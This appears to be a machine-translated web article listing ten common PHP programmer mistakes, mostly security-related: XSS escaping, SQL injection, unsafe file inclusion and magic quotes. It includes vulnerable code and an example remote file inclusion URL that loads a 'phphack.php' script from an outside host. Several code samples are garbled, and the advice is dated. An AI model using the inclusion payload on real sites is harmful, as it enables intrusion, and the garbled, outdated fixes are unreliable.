PHP is a great web development language, flexible language, but see the PHP programmers repeating a number of mistakes. I made the following list, listing the 10 errors that PHP programmers often commit, most of which are related to security. Look how many you've made.
1. Do not turn to HTML entities a basic common sense: all untrusted input (especially the data submitted by the user from the form), will be transferred before the output. Echo $_get[usename];
This example has the potential to output: /* Change the admin password script or set the cookie script */ This is an obvious security risk unless you ensure that your users are correctly entered. How to fix: We need to convert "<", ">", "and" to the correct HTML representation (<,,, and "), Functions Htmlspecialchars and htmlentities () are just doing the work. Correct method: Echo Htmlspecialchars ($_get[username], ent_quotes);
2. Do not switch to SQL input
I have discussed this problem in one of the simplest ways to prevent SQL injection (in php+mysql) and have given a simple method. Someone told me that they had set magic_quotes to on in php.ini, so don't worry about it, but not all the inputs are from $_get, $_post or $_cookie!
How to fix: And in the simplest way to prevent SQL injection (in php+mysql) I still recommend using the mysql_real_escape_string () function
Correct practice:
$sql = "UPDATE users SET
Name=.mysql_real_escape_string ($name).
WHERE id=.mysql_real_escape_string ($id). ";
mysql_query ($sql);
?>
3. Incorrect use of Http-header related functions: Header (), Session_Start (), Setcookie ()
Have you encountered this warning? " Warning:cannot Add header information-headers already sent [....] Each time a webpage is downloaded from the server, the server's output is divided into two parts: the head and the body.
The head contains some non-visual data, such as a cookie. The head always arrives first. The body part includes visual HTML, pictures and other data.
If Output_buffering is set to OFF, all http-header-related functions must be called before the output is available. The problem is that you develop in one environment, and when you deploy to another environment, the output_buffering settings may not be the same. The result turns to stop, and neither the cookie nor the session is set correctly .... How to FIX:
Ensure that Http-header related functions are called before the output and that output_buffering = Off
。 4. Require or include files that use unsafe data
Again: Don't trust data that is not explicitly declared by yourself. Do not Include or require files obtained from $_get, $_post, or $_cookie.
For example:
index.php
Including header, config, database connection, etc
Include ($_get[filename]);
including footer
?>
Now any hacker can now use: http://www.yourdomain.com/index.php?filename=anyfile.txt
To get your confidential information, or execute a PHP script.
If Allow_url_fopen=on, you are more dead:
Try this input:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php now your page contains the HTTP/// The output of the www.youaredoomed.com/phphack.php. Hackers can send spam messages, change passwords, delete files, and more. As long as you want to.
How to FIX:
You must control which files can be included in the include or require directives yourself. Here's a quick, but not comprehensive, workaround:
The Include only files, that is allowed.
$allowedFiles = Array (file1.txt,file2.txt,file3.txt);
if (In_array (String) $_get[filename], $allowedFiles)) {
Include ($_get[filename]);
}
else{
Exit (not allowed);
}
?> 5. Syntax error
Grammatical errors include all lexical and grammatical errors, so common that I have to list them here. The solution is to seriously learn PHP syntax, carefully do not miss a parenthesis, curly braces, semicolons, quotation marks. There is also a good editor, do not use Notepad!
6. Rarely used or not object-oriented
Many projects do not use PHP's object-oriented technology, the result is that the maintenance of code is very time consuming. PHP supports a growing number of object-oriented technologies and is getting better, and there's no reason to not use object-oriented.
7. Do not use the framework
95% of PHP projects are doing the same four things: Create, edit, list, and delete. Now there are a lot of MVC frameworks to help us do these four things, why don't we use them?
8. Do not know what functionality is available in PHP
PHP's core contains many features. Many programmers repeat the invention of the wheel. Wasted a lot of time. Code before you search PHP mamual, Google search, there may be new discoveries! The exec () in PHP is a powerful function that executes the CMD shell and returns the last line of the execution result as a string. Consider that security can be used Escapeshellcmd () 9. Using older versions of PHP many programmers are still using PHP4, the development of PHP4 can not fully exploit the potential of PHP, there are some security risks. Go to PHP5, it doesn't cost a lot. Most PHP4 programs can be migrated to PHP5 without changes or changes. According to Http://www.nexen.net's survey only 12% of PHP servers use PHP5, so 88% of PHP developers are still using PHP4. 10. Do the quotes do two times to comment over the page appears or \ "? This is usually because magic_quotes is set to off in the developer's environment and Magic_quotes =on on the deployed server. PHP will run Addslashes () repeatedly on the data in GET, POST and Cookie.
Original text:
Its a stringmagic quotes on:
Its a string
Run once again
Addslashes ():
It\s a stringhtml output:
Its a string is also a case where the user first entered the wrong login information, the server detects the wrong input, the output of the same form requires the user to enter again, causing the user's input to two times.
http://www.bkjia.com/PHPjc/486543.html www.bkjia.com true http://www.bkjia.com/PHPjc/486543.html techarticle PHP is a great web development language, flexible language, but see the PHP programmers repeating a number of mistakes. I made the following list, listing PHP programmers often commit 10 ...
